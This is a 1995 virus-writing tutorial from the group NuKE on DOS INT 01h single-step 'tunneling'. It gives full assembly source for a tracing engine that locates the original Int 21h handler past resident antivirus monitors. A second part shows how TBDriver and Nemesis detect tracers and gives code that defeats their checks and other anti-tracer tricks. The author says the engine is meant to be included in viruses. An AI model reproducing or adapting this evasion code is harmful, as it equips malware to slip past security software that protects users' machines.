Dark Fiber of [NuKE]

Dark Fiber of [NuKE]

presents

Single Stepping Tunnel Techniques

Part 1

21st August 1995

File Descriptions:

df-tunnl.doc - This document
example.asm - Example program that calls tunnel.asm
example.com - Compiled example.asm
tunnel.asm - The basic tunneling engine.
f-Tunnel.asm - Full blown tunnel engine.
f-exampl.asm - Example using F-Tunnel
f-exampl.com - Compiled f-exampl.asm

Tunneling with INT 01h is an easy thing to do, about as easy as writing
*.COM file viruses, but, for some reason, guides for using INT 01h tunneling
techniques dont exist like *.COM file virus guides do, so I'm going to remedy
that.

The Intel and its clone 8086+ compatibles have a nice mode built into them
called Single Stepping, and its VERY handy for programmers like us, who
want to find something specific in memory, for example, the kernel Int 21h
segment:offset, and bypassing other blocking TSR programs, such as Anti-Virus
behaviour blockers. This tunneling technique is not the be all and end all
of tunneling, as I will discuss some techniques and why they work against
this kind of tunneling further on.

In order to use the Single Step mode, we need to modify one of the bits
in the flag, and have set up an interrupt.

The flag is a 16bit register and consists of the following fields.

��Ŀ
flags �--�--�--�--�OF�DF�IF�TF�SF�ZF�--�AF�--�PF�--�CF�
��
0F 0E 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00

CF : Carry Flag Indicates an arithmetic carry
-- : Unused
PF : Parity Flag Indicates an even number of 1 bits
-- : Unused
AF : Auxilary Flag Indicates adjustment needed in BCD numbers
-- : Unused
ZF : Zero Flag Indicates a zero result, or equal comparison
SF : Sign Flag Indicates negative result/comparison
TF : Trap Flag Controls Single Step operation
IF : Interrupt Flag Controls whether interrupts are enabled
DF : Direction Flag Controls increment direction on string regs.
OF : Overflow Flag Indicates signed arithmetic overflow
-- : Unused
-- : Unused
-- : Unused
-- : Unused

The only one we need to concern ourselves with is the TF flag.
When the trap flag is off, well, the Int 01h is not used, but when we turn
the TF to on, the Int 01h routine is called BEFORE each instruction is
executed.

So, with that order in mind, you must hook the Int 01h, THEN turn on the
trap flag.

First thing that we must do is to hook Int 1h, then we need to set Int 1h,
set the trap flag to on, then lastly, call a function that we wish to trace.

For the example code presented, we will be tunneling Int 21h.
All the code is for a minimum of an 80286 or greater, because I dont care
for coding for the lesser 8086 machine. ;)

;== [ 80286+ | Priming the Tunnel code ] ======================================
; This code will save and hook INT 01h, and put the processor into single
; stepping mode.
;

Int_01v: dd ? ;Old address for Int 01h
Int_21v: dd ? ;the tracer modifies this.

Tunnel:
pusha ;Save our registers,
push es ;Assume we are being called
push ds ;from an external source.

mov ax,03521h
int 021h ;Get Int 21h
cs: mov word ptr [Int_21v],bx ;Save Int 21h address
cs: mov word ptr [Int_21v + 2],es

mov al,01h ;Get Int 01h
int 021h
cs: mov word ptr [Int_01v],bx ;Save Int 01h address
cs: mov word ptr [Int_01v + 2],es

push cs
pop ds ;Set DS = CS for OUR Int 01
;address.
mov ah,025h
mov dx,offset Int_01Handler ;Our Int 01h routine
int 21h ;Set our Int 01h routine

;This first PUSHF, is used in conjunction with the CALL FAR [Int_21v]
;code, as we need a FLAGS on the stack that has not got the TF
;turned to ON.

pushf

pushf
pop ax ;Save the flag
or ax,0100 ;Set the TF to ON
push ax
popf ;restore the flags

;The moment we POPF the flags, the trace mode is initiated
;Because of the way it works, the first instruction immediately
;following the POPF is NOT traced, tracing begins with the
;second instruction AFTER the POPF.

mov ax,03306 ;Set AX for INTERNAL_DOS_VERS.
call far [Int_21v] ;Call the Int 21.
;we are faking an INT 21 call.

;The Int_01Handler routine takes over from here until the trace
;is finished. Only when it's finished will control pass back to this
;piece of code.

;When control is passed back, Int_21v will hold the segment:offset
;of the last cross segment jump before the trace ended.

;Restore the old Int_01h vector
lds dx,word ptr [Int_01v]
mov ax,02501
int 21h

pop ds
pop es
popa ;Restore registers
ret

;==============================================================================

Okey, before I code the Int_1_Handler routine for you, we need to go
over some more theory.

First, is that the Int_1_Handler routine is designed to check what opcode
is going to be run next, so we need to know what some of the opcodes that
we will need to check for are.

26h ES:
2Eh CS:
36h SS:
3Eh DS:
These four are the segment overrides, and are ALWAYS
placed BEFORE the opcode, but the CPU sees them as
part of the same opcode, so we must check for these
and then siphon them off, to get the byte value of
the real opcode. We also use them for to determine
what segment to take data from on things like FAR
cross segment jumps.

9Ch PUSHF
We need to know this so we can get around Nemesis.

9Dh POPF
We need to check for the POPF because we dont want
any other program from turning off the TrapFlag, and
thus, dissableling our trace.

CFh IRET
This is what we use to signal that our trace should
end.

EAh JMP xxxx:yyyy
FFh 1Eh CALL FAR [xxxx]
FFh 2Eh JMP FAR [xxxx]

These three opcodes are used as cross segment jumps,
which commonly hold the seg:offs of the next Int hook.
Because the last two (FF1Eh, FF2Eh) take data from
the segment override, or the current DS, we need to
know what that is too.

;== [ 80286+ | Tunnel Engine ] ================================================
;This is the actual code that does all the hard work.
;It has been somewhat (20bytes) optimised from the engine I used in Lady Death
;And bugfixed too ;)

;These are our register offsets into the SS:SP[BP]

_rfl equ 01A
_rcs equ 018
_rip equ 016
_ax equ 014
_cx equ 012
_dx equ 010
_bx equ 0E
_sp equ 0C
_bp equ 0A
_si equ 08
_di equ 06
_es equ 04
_ds equ 02
_ss equ 00

Int_01Handler:
pusha
push es
push ds ;Save ALL registers.
push ss ;Its not really necessary to save SS ;)
mov bp,sp ;but this engine was built for expansion

;One thing to note, if you want to know the TRUE value of SP, that
;is, you must subtract 6 from it, which covers the calling cs, ip & f.
;and thats sub w[bp+_sp],6 not sub sp,6 ;)

push cs
pop ds

test b[_status],1
je RunNextTest_1
xor b[_status],1
and word ptr [bp+_rfl+2],0feff
jmp GetOpCode

RunNextTest_1:

GetOpCode:
lds si,word ptr [bp+22] ;Get the seg:off of the next opcode

cld ;clear direction
lodsb ;get opcode

;AL now holds our bytevalue opcode.

;Check for a segment override, and if not, assume its working in DS
call GetSegOveride ;Get the segment override
;bx = segment we will be using.

;Check the OPCode in AL
cmp al,09dh ;POPF?
jne ItsNotPOPF
;They are attempting to POP the flags. Just incase they have tried
;to turn the TF off, we keep it turned on.
or word ptr [bp+_rfl+2],0100 ;Keep TRAPFLAG set to on.

ItsNotPOPF:
cmp al,09c
jne ItsNotPUSHF
cs: or byte ptr [_status],1

ItsNotPUSHF:
cmp al,0cf ;IRET
jne ItsNotIRET
;An IRET signals the end of our trace.
;So turn the TF to off.
and word ptr [bp+_rfl],0feff ;Turn trace flag off

ItsNotIRET:
cmp al,0eah ;Jmp xxxx:yyyy
jne ItsNotFarJump

;A Cross segment jump! Save the seg:offset its going to jump into.
;The data for the cross seg jump is contained in the CS: seg.
;So, no change is needed.

FarJumpData:
lodsw
cs: mov word ptr [Int_21v+0],ax
lodsw
cs: mov word ptr [Int_21v+2],ax
jmp RunNextOpCode

ItsNotFarJump:
cmp al,0ffh ;jmp d[xxxx]
jne ItsNotJmpD

cmp byte ptr [si],01eh ;jmp d[xxxx], type 1
jne ItsJmpD
cmp byte ptr [si],02eh ;jmp d[xxxx], type 2
jne ItsNotJmpD

ItsJmpD:
inc si ;skip jump type

;This opcode can use a segment override, so use it!
mov ds,bx ;segment override
lodsw ;get storage offset of seg:offs
mov si,ax ;
jmp FarJumpData ;treat it like jmp xxxx:yyyy

ItsNotJmpD:
;Next opcode here....
;Well, we dont need to monitor any more opcodes....

RunNextOpCode:
pop ss
pop ds
pop es ;Restore the flags
popa
iret ;Run the next opcode.

GetSegOveride:
cmp al,026h ;ES
jne NotSegES
mov bx,word ptr [bp+_es]
lodsb ;Skip seg override, to get next opcode
ret

NotSegES:
cmp al,02eh ;CS
jne NotSegCS
mov bx,word ptr [bp+_rcs]
lodsb ;Skip seg override, to get next opcode
ret

NotSegCS:
cmp al,036h ;SS
jne NotSegSS
mov bx,word ptr [bp+_ss]
lodsb ;Skip seg override, to get next opcode
ret

NotSegSS:
cmp al,03eh ;DS
jne NotSegDS
mov bx,word ptr [bp+_ds]
lodsb ;Skip seg override, to get next opcode
ret

NotSegDS:
mov bx,word ptr [bp+_ds] ;DS
ret ;No override, so assume DS

_status: db 0

;==============================================================================

The code presented here is, when compiled, somewhere around 200bytes
long. Which I think is not too big, when you include it in a virus.
The engine presented here was very basic in its structure. It did not
check for things like

JMP DOUBLE [BX+4]
JMP DOUBLE [BX]
JMP DOUBLE [SI-4]

etc,
or

CALL DOUBLE [BX]

The reason being is that there are lots of other techniques for cross segment
jumping, and including all types would expand the engine considerably, and
they would not really be necessary in a virus.

Single Stepping Tunneling Techniques

Part 2

Anti-Tracers

Okey, so you have run the Example.Com program and TBDriver has beeped
to the tune of Example.Com is trying to trace the Interrupt chain, or something
to that effect. Your first question should be "How the hell does it know we
are tracing it?"

Well, I'm glad you asked! ;)

Here is a simple representation

Code Memory Stack Memory

mov ax,1234h
push ax 1234h
mov bx,5678h 1234h
mov cx,DEADh 1234h
push cx DEADh, 1234h
push bx 5678h, DEADh, 1234h

pop ax ;=5678h DEADh, 1234h
pop bx ;=DEADh 1234h
pop cx ;=1234h

Now, even tho we have popped them off memory, what has actually happend is
that the SP add had 2 added to it each time, adjusting where it points to,
but those values ARE STILL IN MEMORY, just below where SP points to currently.

so, if we did

sub sp,6

the Stack Memory would look like

5678h, DEADh, 1234h

The contents of memory have not been altered in any way, just the pointer
to the memory has.

Now, using the above example, this is what happens when we tunnel

assume, int 1 CS=code, flags=flags, and the # is the ip.

When an INT occurs, it pushes the flags, cs, and ip onto the stack.

Code Memory Stack Memory
cs:=code

1) mov ax,1234h
2) *int 1* 3, code, flags,
3) push ax 1234h
4) *int 1* 5, code, flags, 1234h
5) mov bx,5678h 1234h
6) *int 1* 7, code, flags, 1234h
7) mov cx,DEADh 1234h
8) *int 1* 9, code, flags, 1234h
9) push cx DEADh, 1234h
a) *int 1* b, code, flags, DEADh, 1234h
b) push bx 5678h, DEADh, 1234h
c) *int 1* d, code, flags, 5678h, DEADh...
d) pop ax ;=5678h DEADh, 1234h
e) *int 1* f, code, flags, DEADh, 1234h
f) pop bx ;=DEADh 1234h
10) *int 1* 11, code, flags, 1234h
11) pop cx ;=1234h

Now, if we were to subtract SP by 6, this time our Stack Memory would look
like this,

code, flags, 1234

Notice that the bottom 4 bytes are not 5678h, DEADh, thats because when an
Int 1 occurs, it overwrites what's underneath it.

(Hope I'm explaining this so you understand ;)

This is how TBdriver detects a tracer is in memory.

Here is the actual TBDriver code

push bx
push ax
xchg ax,bx
pop ax
dec sp
dec sp
pop bx
cmp ax,bx
pop bx

Now, when it's run without a tracer its Stack Memory looks like this

assume ax=1234, bx=5678

Code Stack
push bx ;bx=5678h 5678h

push ax ;ax=1234h 1234h, 5678h

xchg ax,bx ;ax=5678h 1234h, 5678h
;bx=1234h

pop ax ;ax=1234h 5678h
;bx=1234h
dec sp 34h, 5678h
dec sp 1234h, 5678h

pop bx ;ax=1234h 5678h
;bx=1234h

cmp ax,bx ;ax=1234h 5678h
;bx=1234h

pop bx ;ax=1234h
;bx=5678h

Underneath the stack, it looks like this

1234h, 5678h

Because the SP is decremented, and the stack untouched, 1234h is still
there.

Now, if we traced it....

Code Stack
push bx ;bx=5678h 5678h

*int 1* ip, code, flags, 5678h

push ax ;ax=1234h 1234h, 5678h

*int 1* ip, code, flags, 1234h, 5678h

xchg ax,bx ;ax=5678h 1234h, 5678h
;bx=1234h

*int 1* ip, code, flags, 1234h, 5678h

pop ax ;ax=1234h 5678h
;bx=1234h

*int 1* ip, code, flags, 5678h

dec sp ags, 5678h
dec sp flags, 5678h

*int 1* ip, code, flags, flags, 5678h

pop bx ;ax=1234h ;5678h
;bx=flags
*int 1* ip, code, flags, 5678h

cmp ax,bx ;ax=1234h 5678h
;bx=flags

*int 1* ip, code, flags, 5678h

pop bx ;ax=1234h
;bx=5678h

Now, when SP is decremented, because the last value pushed was the flags,
it overwrote the previously pushed AX in memory...... TB detects this,
notices its not what it expected it to be, and knows we are tracing it.

How do we get around this? Well, in TBDriver, it's structured so that
the first two bytes are a short jump OVER a far jump to the original
DOS Int21h..... So we check for TBcode, and use the far jump data ;)

The code to fool TBScan looks like this

;Place this code underneath the ItsNotJmpD: label.
TBKiller:
cmp al,0fah ;CLI?
jne EndTBKiller
lodsw
cmp ax,0fc9c ;Is it TBDriver?
jne EndTBKiller
lodsw
cmp ax,05053 ;TBDriver?
jne EndTBKiller
sub si,10
mov w[bp+_rip],si ;Run the original FAR jump
inc si ;skip EAh, so its data.
jmp FARJumpData

EndTBKiller:

"Gee, I heard Nemesis is damn tricky?" Eh? Not any more! All Nemesis
does to find tracers is do a PUSHF, then check W[BP+xx],0404, JB,
Now, if the TF is on, the FLAGS is > 0404, so, we add a status bit that
tells us that the LAST OPCODE RUN was a PUSHF, so remove the TF ;)
Now is that simple or what?

The last method of killing a tracer while its running goes like this.

1. Get the address of Int 1h
2. Replace the first byte of the Int 1h seg:offs with an IRET opcode
3. Remove the trace flag
4. Restore the frist byte of Int 1h

To do that the code looks like

mov ax,03501h
int 21h
mov cl,0CFh
es: xchg byte ptr [bx], cl
pushf
pop ax
and ax,0feff
push ax
popf
es: xchg byte ptr [bx], cl

Now, how do you defeat this? Well, this *type* is pretty easy to avoid to.
The code goes something like this.

;Under the EndTBKiller: label goes this,

Kill_INT_1_Killers:
cmp al,0CDh ;INT call?
jne End_Kill_Int_1_Killers
cmp byte ptr [si],021h ;21?
jne End_Kill_Int_1_Killers
cmp word ptr [bp+_ax],03501 ;GET INT 1?
jne End_Kill_Int_1_Killers
cs: or byte ptr [_Status],2 ;turn on fake int adres
End_Kill_Int_1_Killers:

;Under RunNextTest_1: put the code
test byte ptr [_Status],2 ;fake the address?
je RunNextTest_2
xor byte ptr [_Status],2
mov ax, word ptr [Int_01v] ;get the orig, int 1 address
mov word ptr [bp+_bx],ax ;put in into bx
mov ax, word ptr [Int_01v+2]
mov word ptr [bp+_es],ax ;put it into es
;Now when it writes a byte to int 1, it
;will be writting to the unused int 1.
RunNextTest_2:

But what happens if they get our Int_1 address directly from the IVT?
Well..... you can check if they are putting a byte into our segment,
but, because of the miriad of different ways one can put a byte into
a position in memory, well, if you are a masochist you can come up with
that code all by yourself.

Well, I hope I've explained it so that you understand how tunnelers work.
If you want to see a different kind of tunneler check out ART 2.2, the
full source code is in vlad#4. This tunneler does not use int 1, but rather
decodes each single opcode.

Ah well, if you didn't understand then i really screwed up.